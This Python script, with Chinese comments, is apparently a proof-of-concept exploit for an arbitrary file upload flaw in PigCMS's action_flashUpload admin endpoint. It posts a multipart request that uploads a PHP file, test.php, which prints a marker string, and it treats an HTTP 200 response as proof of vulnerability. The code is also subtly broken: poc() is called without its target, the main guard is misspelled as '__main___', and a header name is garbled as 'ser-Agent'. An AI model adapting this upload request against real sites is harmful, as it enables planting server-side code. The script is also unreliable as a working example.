#导包
import requests,argparse,sys,json
from multiprocessing.dummy import Pool
#关闭警告
requests.packages.urllib3.disable_warnings()

#横幅
def banner():
    test = """

                _     _ _                          ______ _ _        _    _       _                 _ 
     /\        | |   (_) |                        |  ____(_) |      | |  | |     | |               | |
    /  \   _ __| |__  _| |_ _ __ __ _ _ __ _   _  | |__   _| | ___  | |  | |_ __ | | ___   __ _  __| |
   / /\ \ | '__| '_ \| | __| '__/ _` | '__| | | | |  __| | | |/ _ \ | |  | | '_ \| |/ _ \ / _` |/ _` |
  / ____ \| |  | |_) | | |_| | | (_| | |  | |_| | | |    | | |  __/ | |__| | |_) | | (_) | (_| | (_| |
 /_/    \_\_|  |_.__/|_|\__|_|  \__,_|_|   \__, | |_|    |_|_|\___|  \____/| .__/|_|\___/ \__,_|\__,_|
                                            __/ |                          | |                        
                                           |___/                           |_|                        

"""
    print(test)

#主函数
def main():
    banner()
    parser = argparse.ArgumentParser(description='PigCMS action_flashUpload 任意文件上传漏洞')
    parser.add_argument('-url','--url',dest='url',type=str,help='input your url')
    args = parser.parse_args()
    if args.url:
        poc()

#poc函数
def poc(target):
    payload = '/cms/manage/admin.php?m=manage&c=background&a=action_flashUpload'
    headers = { 'ser-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.2840.80 Safari/537.36',
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'Connection': 'close',
                'Content-Type': 'multipart/form-data; boundary=----aaa',
                'Content-Length': '134',
    }
    data = '------aaa\nContent-Disposition: form-data; name="filePath"; filename="test.php"\nContent-Type: video/x-flv\n\n<?php print "qaxnb123";?>\n------aaa'
    res = requests.post(url=target + payload,headers=headers,data=data)
    if res.status_code == 200:
        print(f'[+]{target}存在漏洞')
    else:
        print(f'[-]{target}不存在漏洞')
#函数入口
if __name__=="__main___":
    main()

